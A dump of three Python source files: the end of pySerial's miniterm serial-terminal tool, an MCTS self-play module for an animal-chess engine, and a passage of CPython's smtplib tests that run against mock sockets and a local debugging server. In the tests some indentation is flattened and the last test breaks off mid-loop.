            # any other key: try to reopen the same port
            try:
                self.serial.open()
            except Exception as e:
                sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
        if do_change_port:
            # change_port restarts the reader itself
            self.change_port()
        else:
            # and restart the reader thread
            self._start_reader()
            sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
    def get_help_text(self):
        """Return the help text shown by the CTRL+H menu entry."""
        # help text, starts with blank line!
        return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
---    {menu:7} Send the menu character itself to remote
---    {exit:7} Send the exit character itself to remote
---    {info:7} Show info
---    {upload:7} Upload file (prompt will be shown)
---    {repr:7} encoding
---    {filter:7} edit filters
--- Toggles:
---    {rts:7} RTS   {dtr:7} DTR   {brk:7} BREAK
---    {echo:7} echo  {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
---    p          change port
---    7 8        set data bits
---    N E O S M  change parity (None, Even, Odd, Space, Mark)
---    1 2 3      set stop bits (1, 2, 1.5)
---    b          change baud rate
---    x X        disable/enable software flow control
---    r R        disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
           exit=key_description(self.exit_character),
           menu=key_description(self.menu_character),
           rts=key_description('\x12'),
           dtr=key_description('\x04'),
           brk=key_description('\x02'),
           echo=key_description('\x05'),
           info=key_description('\x09'),
           upload=key_description('\x15'),
           repr=key_description('\x01'),
           filter=key_description('\x06'),
           eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
    """Command line tool, entry point.

    The ``default_*`` parameters let a wrapper script pre-select a port,
    baud rate and initial RTS/DTR line states.
    """
    import argparse

    parser = argparse.ArgumentParser(
        description="Miniterm - A simple terminal program for the serial port.")

    parser.add_argument(
        "port",
        nargs='?',
        help="serial port name ('-' to show port list)",
        default=default_port)

    parser.add_argument(
        "baudrate",
        nargs='?',
        type=int,
        help="set baud rate, default: %(default)s",
        default=default_baudrate)

    group = parser.add_argument_group("port settings")

    group.add_argument(
        "--parity",
        choices=['N', 'E', 'O', 'S', 'M'],
        type=lambda c: c.upper(),
        help="set parity, one of {N E O S M}, default: N",
        default='N')

    group.add_argument(
        "--rtscts",
        action="store_true",
        help="enable RTS/CTS flow control (default off)",
        default=False)

    group.add_argument(
        "--xonxoff",
        action="store_true",
        help="enable software flow control (default off)",
        default=False)

    group.add_argument(
        "--rts",
        type=int,
        help="set initial RTS line state (possible values: 0, 1)",
        default=default_rts)

    group.add_argument(
        "--dtr",
        type=int,
        help="set initial DTR line state (possible values: 0, 1)",
        default=default_dtr)

    group.add_argument(
        "--ask",
        action="store_true",
        help="ask again for port when open fails",
        default=False)

    group = parser.add_argument_group("data handling")

    group.add_argument(
        "-e", "--echo",
        action="store_true",
        help="enable local echo (default off)",
        default=False)

    group.add_argument(
        "--encoding",
        dest="serial_port_encoding",
        metavar="CODEC",
        help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
        default='UTF-8')

    group.add_argument(
        "-f", "--filter",
        action="append",
        metavar="NAME",
        help="add text transformation",
        default=[])

    group.add_argument(
        "--eol",
        choices=['CR', 'LF', 'CRLF'],
        type=lambda c: c.upper(),
        help="end of line mode",
        default='CRLF')

    group.add_argument(
        "--raw",
        action="store_true",
        help="Do no apply any encodings/transformations",
        default=False)

    group = parser.add_argument_group("hotkeys")

    group.add_argument(
        "--exit-char",
        type=int,
        metavar='NUM',
        help="Unicode of special character that is used to exit the application, default: %(default)s",
        default=0x1d)  # GS/CTRL+]

    group.add_argument(
        "--menu-char",
        type=int,
        metavar='NUM',
        help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
        default=0x14)  # Menu: CTRL+T

    group = parser.add_argument_group("diagnostics")

    group.add_argument(
        "-q", "--quiet",
        action="store_true",
        help="suppress non-error messages",
        default=False)

    group.add_argument(
        "--develop",
        action="store_true",
        help="show Python traceback on error",
        default=False)

    args = parser.parse_args()

    # the two hotkeys must be distinct or the menu could never be entered
    if args.menu_char == args.exit_char:
        parser.error('--exit-char can not be the same as --menu-char')

    if args.filter:
        # 'help' is a pseudo filter name: list the real ones and exit
        if 'help' in args.filter:
            sys.stderr.write('Available filters:\n')
            sys.stderr.write('\n'.join(
                '{:<10} = {.__doc__}'.format(k, v)
                for k, v in sorted(TRANSFORMATIONS.items())))
            sys.stderr.write('\n')
            sys.exit(1)
        filters = args.filter
    else:
        filters = ['default']

    # retry loop: with --ask, a failed open re-prompts for a port
    while True:
        # no port given on command line -> ask user now
        if args.port is None or args.port == '-':
            try:
                args.port = ask_for_port()
            except KeyboardInterrupt:
                sys.stderr.write('\n')
                parser.error('user aborted and port is not given')
        else:
            if not args.port:
                parser.error('port is not given')
        try:
            serial_instance = serial.serial_for_url(
                args.port,
                args.baudrate,
                parity=args.parity,
                rtscts=args.rtscts,
                xonxoff=args.xonxoff,
                do_not_open=True)

            if not hasattr(serial_instance, 'cancel_read'):
                # enable timeout for alive flag polling if cancel_read is not available
                serial_instance.timeout = 1

            if args.dtr is not None:
                if not args.quiet:
                    sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
                serial_instance.dtr = args.dtr
            if args.rts is not None:
                if not args.quiet:
                    sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
                serial_instance.rts = args.rts

            serial_instance.open()
        except serial.SerialException as e:
            sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
            if args.develop:
                raise
            if not args.ask:
                sys.exit(1)
            else:
                # forget the failed port so the next iteration re-prompts
                args.port = '-'
        else:
            break

    miniterm = Miniterm(
        serial_instance,
        echo=args.echo,
        eol=args.eol.lower(),
        filters=filters)
    # unichr: Py2 name — presumably aliased to chr for Py3 earlier in this
    # module (not visible in this chunk); verify
    miniterm.exit_character = unichr(args.exit_char)
    miniterm.menu_character = unichr(args.menu_char)
    miniterm.raw = args.raw
    miniterm.set_rx_encoding(args.serial_port_encoding)
    miniterm.set_tx_encoding(args.serial_port_encoding)

    if not args.quiet:
        sys.stderr.write('--- Miniterm on {p.name}  {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
            p=miniterm.serial))
        sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
            key_description(miniterm.exit_character),
            key_description(miniterm.menu_character),
            key_description(miniterm.menu_character),
            key_description('\x08')))

    miniterm.start()
    try:
        # wait for the transmitter first; the reader may still be draining
        miniterm.join(True)
    except KeyboardInterrupt:
        pass
    if not args.quiet:
        sys.stderr.write("\n--- exit ---\n")
    miniterm.join()
    miniterm.close()
|
mcts.py | import torch, math, os
import numpy as np
import pickle, collections, time
from utils import load_net
from tqdm import tqdm
from animal_chess_pymodule import *
from alpha_zero_net import ChessNet
import torch.multiprocessing as mp
class Node():
    """One state in the MCTS search tree.

    Child statistics (priors, value sums, visit counts) live in the
    *parent's* fixed-size arrays indexed by move, so a node reads/writes its
    own stats through ``self.parent.child_*[self.move]``. The root's parent
    is a DummyNode whose defaultdicts accept any move index.
    """

    MAX_ACTION = 252  # size of the flat move-index space

    def __init__(self, game, move, parent=None):
        self.is_expanded = False
        self.parent = parent
        self.game = game
        self.move = move  # move index that led from parent to this node
        self.children = {}
        # NOTE: np.float / np.bool aliases were removed in NumPy 1.24; the
        # builtins are the documented replacements (same float64 dtype).
        self.child_priors = np.zeros([Node.MAX_ACTION], dtype=float)
        self.child_total_value = np.zeros([Node.MAX_ACTION], dtype=float)
        self.child_number_visits = np.zeros([Node.MAX_ACTION], dtype=float)
        self.action_idxes = []  # legal move indices, filled by expand()

    @property
    def number_visits(self):
        """Visit count of this node, stored in the parent's array."""
        return self.parent.child_number_visits[self.move]

    @number_visits.setter
    def number_visits(self, value):
        self.parent.child_number_visits[self.move] = value

    @property
    def total_value(self):
        """Accumulated value of this node, stored in the parent's array."""
        return self.parent.child_total_value[self.move]

    @total_value.setter
    def total_value(self, value):
        self.parent.child_total_value[self.move] = value

    def child_Q(self):
        """Mean value per child (visits+1 avoids division by zero)."""
        return self.child_total_value / (self.child_number_visits + 1)

    def child_U(self):
        """Exploration bonus per child (UCB term scaled by priors)."""
        return math.sqrt(self.number_visits) * (abs(self.child_priors)
                                                / (1 + self.child_number_visits))

    def best_child(self):
        """Return the move index maximizing Q+U, restricted to legal moves."""
        if self.action_idxes != []:
            bestmove = self.child_Q() + self.child_U()
            bestmove = self.action_idxes[np.argmax(bestmove[self.action_idxes])]
        else:
            bestmove = np.argmax(self.child_Q() + self.child_U())
        return bestmove

    def maybe_add_child(self, move):
        """Return the child for *move*, creating it on first visit."""
        if move not in self.children:
            self.children[move] = Node(self.game, move, parent=self)
        return self.children[move]

    def select_leaf(self):
        """Walk down by best_child, playing each move on the shared game."""
        current = self
        while current.is_expanded:
            best_move = current.best_child()
            current.game.move_chess(best_move)
            current = current.maybe_add_child(best_move)
        return current

    def add_dirichlet_noise(self):
        """Blend Dirichlet noise into the legal-move priors (exploration)."""
        valid_child_priors = self.child_priors[self.action_idxes]  # select only legal moves entries in child_priors array
        valid_child_priors = 0.75 * valid_child_priors + 0.25 * np.random.dirichlet(np.zeros([len(valid_child_priors)], dtype=np.float32) + 192)
        self.child_priors[self.action_idxes] = valid_child_priors

    def expand(self, child_priors):
        """Attach network priors, masking out illegal moves."""
        self.is_expanded = True
        self.action_idxes = self.game.generate_all_steps()
        if self.action_idxes == []:
            # no legal moves: keep the node a leaf
            self.is_expanded = False
        self.child_priors = child_priors
        mask = np.ones(len(self.child_priors), bool)
        mask[self.action_idxes] = False
        self.child_priors[mask] = 0.0
        # if isinstance(self.parent, DummyNode): # root
        self.add_dirichlet_noise()

    def backup(self, value_estimate: float):
        """Propagate *value_estimate* up to the root, undoing moves."""
        current = self
        while current.parent is not None:
            current.number_visits += 1
            if current.game.role() == Role.BLACK:  # same as current.parent.game.player = 0
                current.total_value += (1 * value_estimate)  # value estimate +1 = white win
            elif current.game.role() == Role.RED:  # same as current.parent.game.player = 1
                current.total_value += (-1 * value_estimate)
            if not isinstance(current.parent, DummyNode):  # root
                current.game.undo_move()
            current = current.parent

    def get_policy(self):
        """Return visit counts normalized into a probability vector."""
        policy = np.zeros(Node.MAX_ACTION)
        for idx in np.where(self.child_number_visits != 0)[0]:
            policy[idx] = self.child_number_visits[idx] / self.child_number_visits.sum()
        return policy
class DummyNode(object):
    """Sentinel parent for the search root.

    Stores child statistics in defaultdicts so the root Node can read and
    write ``parent.child_*[move]`` without a pre-sized array; ``parent is
    None`` terminates Node.backup().
    """

    def __init__(self):
        self.parent = None
        # defaultdict(float): any move index reads as 0.0 until written
        self.child_total_value = collections.defaultdict(float)
        self.child_number_visits = collections.defaultdict(float)
def UCT_search(game_state, times, net):
    """Run *times* MCTS simulations from *game_state* guided by *net*.

    Returns ``(best_move_index, policy_vector)`` where the policy is the
    normalized visit-count distribution at the root. The root is anchored
    to a DummyNode so backup() knows where to stop.
    """
    root = Node(game_state, move=None, parent=DummyNode())
    for i in (range(times)):
        # selection mutates game_state along the path; backup() undoes it
        leaf = root.select_leaf()
        # print('leaf step count = ', leaf.game.get_step_count());
        encoded_s = torch.from_numpy(np.array(leaf.game.encode_board())).float()
        if torch.cuda.is_available(): encoded_s = encoded_s.cuda()
        child_priors, value_estimate = net(encoded_s)
        value_estimate = value_estimate.item()
        if leaf.game.check_win() is not None:  # if checkmate
            # terminal node: back up the exact game outcome instead of the
            # network's value estimate (RED win = +1, otherwise -1)
            if leaf.game.check_win() == Role.RED:
                leaf.backup(1)
            else:
                leaf.backup(-1)
            continue
        child_priors = child_priors.detach().cpu().numpy().reshape(-1)
        leaf.expand(child_priors)  # need to make sure valid moves
        leaf.backup(value_estimate)
    return np.argmax(root.child_number_visits), root.get_policy()
def worker(iter, num_games, net, workid = 0):
    """Play *num_games* self-play games with MCTS guided by *net* and dump
    each game's (state, policy, value) triples to datasets/iter<iter>/.

    ``iter`` shadows the builtin but is kept for caller compatibility.
    """
    for n in tqdm(range(num_games)):
        # board = Board('2L3t/1d3c1/r1p1w1e/7/7/7/E1W1P1R/1C3D1/T3l2 w')
        board = Board()
        checkmate = False
        dataset = []
        value = 0
        move_count = 0
        while not checkmate:
            elapse = time.perf_counter()
            # 1400 MCTS simulations per move
            best_move, policy = UCT_search(board, 1400, net)
            elapse = time.perf_counter() - elapse
            encoded_s = np.array(board.encode_board())
            dataset.append([encoded_s, policy])
            print("=============")
            print("[workid:{}] elapse = {:.3f}s move_count = {} dup_times = {}".format(workid, elapse, move_count, board.get_dup_count()))
            print(board)
            print("best_move = {} ({})".format(board.decode_move(best_move), best_move))
            board.move_chess(best_move)
            win_status = board.check_win()
            if win_status is not None:
                print("[workid:{}] game end! dup_times = {}".format(workid, board.get_dup_count()))
                print(board)
                # value from RED's perspective: -1 when BLACK wins, else +1
                if win_status == Role.BLACK:
                    value = -1
                else:
                    value = 1
                checkmate = True
            move_count += 1
        print("iter {} checkmate {} value = {}".format(iter, checkmate, value))
        # if not checkmate: continue
        dataset_pv = []
        for idx, data in enumerate(dataset):
            s, p = data
            if idx == 0:
                # NOTE(review): the opening position is labeled 0 instead of
                # `value` — presumably intentional (no signal at the start
                # state), but verify against the training code
                dataset_pv.append([s, p, 0])
            else:
                dataset_pv.append([s, p, value])
        # millisecond timestamp keeps filenames unique across workers
        with open('./datasets/iter{}/dataset_{}.pkl'.format(iter, int(time.time() * 1000)), 'wb') as f:
            pickle.dump(dataset_pv, f)
def MCTS_self_play(iter, num_games, workers = 1):
    """Run self-play data generation for iteration *iter*.

    With workers > 1 the network is shared across spawned processes, each
    running its own worker() loop; otherwise worker() runs inline.
    """
    out_dir = 'datasets/iter{}'.format(iter)
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    net = load_net(iter)
    parallel = workers > 1
    if parallel:
        # make the model's storage shareable before forking/spawning
        net.share_memory()
        mp.set_start_method("spawn", force=True)
    net.eval()
    if not parallel:
        worker(iter, num_games, net)
        return
    procs = [mp.Process(target=worker, args=(iter, num_games, net, i))
             for i in range(workers)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
|
test_smtplib.py | import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST
from test.support import threading_setup, threading_cleanup, join_thread
from test.support import requires_hashdigest
from unittest.mock import Mock
if sys.platform == 'darwin':
    # select.poll returns a select.POLLHUP at the end of the tests
    # on darwin, so just ignore it
    def handle_expt(self):
        """No-op replacement for SMTPChannel.handle_expt on macOS."""
        pass
    # monkeypatch applies to every SMTPChannel created by these tests
    smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
    """Accept one client on *serv*, push *buf* to it, then signal *evt*.

    *evt* is set once when listening starts and again on shutdown.
    """
    serv.listen()
    evt.set()
    try:
        conn, addr = serv.accept()
    except socket.timeout:
        pass
    else:
        # iteration budget so a stalled client cannot hang the test forever
        budget = 500
        while buf and budget > 0:
            r, w, e = select.select([], [conn], [])
            if w:
                written = conn.send(buf)
                buf = buf[written:]
            budget -= 1
        conn.close()
    finally:
        serv.close()
        evt.set()
class GeneralTests(unittest.TestCase):
    """smtplib.SMTP behavior against the mock_socket test double — no real
    network traffic is involved in these tests."""

    def setUp(self):
        # route smtplib's socket calls through the in-memory mock
        smtplib.socket = mock_socket
        self.port = 25

    def tearDown(self):
        # restore the real socket module for other test classes
        smtplib.socket = socket

    # This method is no longer used but is retained for backward compatibility,
    # so test to make sure it still works.
    def testQuoteData(self):
        teststr = "abc\n.jkl\rfoo\r\n..blue"
        expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
        self.assertEqual(expected, smtplib.quotedata(teststr))

    def testBasic1(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects
        smtp = smtplib.SMTP(HOST, self.port)
        smtp.close()

    def testSourceAddress(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects
        smtp = smtplib.SMTP(HOST, self.port,
                            source_address=('127.0.0.1',19876))
        self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
        smtp.close()

    def testBasic2(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects, include port in host name
        smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
        smtp.close()

    def testLocalHostName(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # check that supplied local_hostname is used
        smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
        self.assertEqual(smtp.local_hostname, "testhost")
        smtp.close()

    def testTimeoutDefault(self):
        mock_socket.reply_with(b"220 Hola mundo")
        self.assertIsNone(mock_socket.getdefaulttimeout())
        mock_socket.setdefaulttimeout(30)
        self.assertEqual(mock_socket.getdefaulttimeout(), 30)
        try:
            smtp = smtplib.SMTP(HOST, self.port)
        finally:
            # always restore the global default, even if SMTP() raised
            mock_socket.setdefaulttimeout(None)
        self.assertEqual(smtp.sock.gettimeout(), 30)
        smtp.close()

    def testTimeoutNone(self):
        mock_socket.reply_with(b"220 Hola mundo")
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            # timeout=None must override the 30s global default
            smtp = smtplib.SMTP(HOST, self.port, timeout=None)
        finally:
            socket.setdefaulttimeout(None)
        self.assertIsNone(smtp.sock.gettimeout())
        smtp.close()

    def testTimeoutValue(self):
        mock_socket.reply_with(b"220 Hola mundo")
        smtp = smtplib.SMTP(HOST, self.port, timeout=30)
        self.assertEqual(smtp.sock.gettimeout(), 30)
        smtp.close()

    def test_debuglevel(self):
        mock_socket.reply_with(b"220 Hello world")
        smtp = smtplib.SMTP()
        smtp.set_debuglevel(1)
        with support.captured_stderr() as stderr:
            smtp.connect(HOST, self.port)
        smtp.close()
        # level 1: plain "connect:" lines without timestamps
        expected = re.compile(r"^connect:", re.MULTILINE)
        self.assertRegex(stderr.getvalue(), expected)

    def test_debuglevel_2(self):
        mock_socket.reply_with(b"220 Hello world")
        smtp = smtplib.SMTP()
        smtp.set_debuglevel(2)
        with support.captured_stderr() as stderr:
            smtp.connect(HOST, self.port)
        smtp.close()
        # level 2 prefixes each debug line with a HH:MM:SS.micros timestamp
        expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
                              re.MULTILINE)
        self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
    """Drive *serv* (an smtpd server) on the asyncore loop until the client
    signals completion via *client_evt* or the iteration budget runs out.

    *serv_evt* is set once on startup and again after shutdown.
    """
    serv_evt.set()
    try:
        if hasattr(select, 'poll'):
            poll_fun = asyncore.poll2
        else:
            poll_fun = asyncore.poll
        # iteration budget: ~10s worst case at 0.01s per poll
        n = 1000
        while asyncore.socket_map and n > 0:
            poll_fun(0.01, asyncore.socket_map)
            # when the client conversation is finished, it will
            # set client_evt, and it's then ok to kill the server
            if client_evt.is_set():
                serv.close()
                break
            n -= 1
    except socket.timeout:
        pass
    finally:
        if not client_evt.is_set():
            # allow some time for the client to read the result
            time.sleep(0.5)
        serv.close()
        asyncore.close_all()
        serv_evt.set()
# Sentinel lines that smtpd.DebuggingServer prints around each received
# message body; tests reconstruct the expected captured output from these.
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
    def setUp(self):
        """Start a DebuggingServer on a random port in a background thread."""
        self.thread_key = threading_setup()
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        # temporarily replace sys.stdout to capture DebuggingServer output
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Capture SMTPChannel debug output
        self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
        smtpd.DEBUGSTREAM = io.StringIO()
        # Pick a random unused port by passing 0 for the port number
        self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
                                          decode_data=True)
        # Keep a note of what server host and port were assigned
        self.host, self.port = self.serv.socket.getsockname()[:2]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()
        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()
    def tearDown(self):
        """Shut down the server thread and restore patched globals."""
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        join_thread(self.thread)
        # restore sys.stdout
        sys.stdout = self.old_stdout
        # restore DEBUGSTREAM
        smtpd.DEBUGSTREAM.close()
        smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
        del self.thread
        self.doCleanups()
        threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=3, source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
    def testSend(self):
        # connect and send mail, then verify what the server printed
        m = 'A test message'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        smtp.sendmail('John', 'Sally', m)
        # XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
        # in asyncore. This sleep might help, but should really be fixed
        # properly by using an Event variable.
        time.sleep(0.01)
        smtp.quit()
        # let the server loop finish before reading its captured stdout
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
    """sendmail() accepts a bytes payload and it arrives unchanged."""
    m = b'A test message'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.sendmail('John', 'Sally', m)
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    # The server output is text, so compare against the decoded payload.
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
    self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
    """Lines starting with '.' must survive SMTP dot-quoting intact."""
    # Issue 12283
    m = '.A test\n.mes.sage.'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.sendmail('John', 'Sally', m)
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
    self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
    """A null reverse-path ('<>') is transmitted and logged as-is."""
    m = 'A test message'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.sendmail('<>', 'Sally', m)
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
    self.assertEqual(self.output.getvalue(), mexpect)
    # The server's debug log must show the null sender verbatim.
    debugout = smtpd.DEBUGSTREAM.getvalue()
    sender = re.compile("^sender: <>$", re.MULTILINE)
    self.assertRegex(debugout, sender)
def testSendMessage(self):
    """send_message() delivers a MIMEText message intact."""
    m = email.mime.text.MIMEText('A test message')
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.send_message(m, from_addr='John', to_addrs='Sally')
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    # Remove the X-Peer header that DebuggingServer adds as figuring out
    # exactly what IP address format is put there is not easy (and
    # irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
    # not always the same as socket.gethostbyname(HOST). :(
    test_output = self.get_output_without_xpeer()
    del m['X-Peer']
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
    self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
    """To/CC/Bcc are all used as recipients; Bcc is stripped from headers."""
    m = email.mime.text.MIMEText('A test message')
    m['From'] = 'foo@bar.com'
    m['To'] = 'John'
    m['CC'] = 'Sally, Fred'
    m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.send_message(m)
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()
    # make sure the Bcc header is still in the message.
    self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
                               '<warped@silly.walks.com>')

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    # Remove the X-Peer header that DebuggingServer adds.
    test_output = self.get_output_without_xpeer()
    del m['X-Peer']
    # The Bcc header should not be transmitted.
    del m['Bcc']
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
    self.assertEqual(test_output, mexpect)
    # Every address from To, CC and Bcc must appear in the envelope recips.
    debugout = smtpd.DEBUGSTREAM.getvalue()
    sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
    self.assertRegex(debugout, sender)
    for addr in ('John', 'Sally', 'Fred', 'root@localhost',
                 'warped@silly.walks.com'):
        to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                             re.MULTILINE)
        self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
    """Recipient collection works when only some of To/CC/Bcc exist."""
    # Make sure nothing breaks if not all of the three 'to' headers exist
    m = email.mime.text.MIMEText('A test message')
    m['From'] = 'foo@bar.com'
    m['To'] = 'John, Dinsdale'
    smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
    self.addCleanup(smtp.close)
    smtp.send_message(m)
    # XXX (see comment in testSend)
    time.sleep(0.01)
    smtp.quit()

    self.client_evt.set()
    self.serv_evt.wait()
    self.output.flush()
    # Remove the X-Peer header that DebuggingServer adds.
    test_output = self.get_output_without_xpeer()
    del m['X-Peer']
    mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
    self.assertEqual(test_output, mexpect)
    debugout = smtpd.DEBUGSTREAM.getvalue()
    sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
    self.assertRegex(debugout, sender)
    for addr in ('John', 'Dinsdale'):
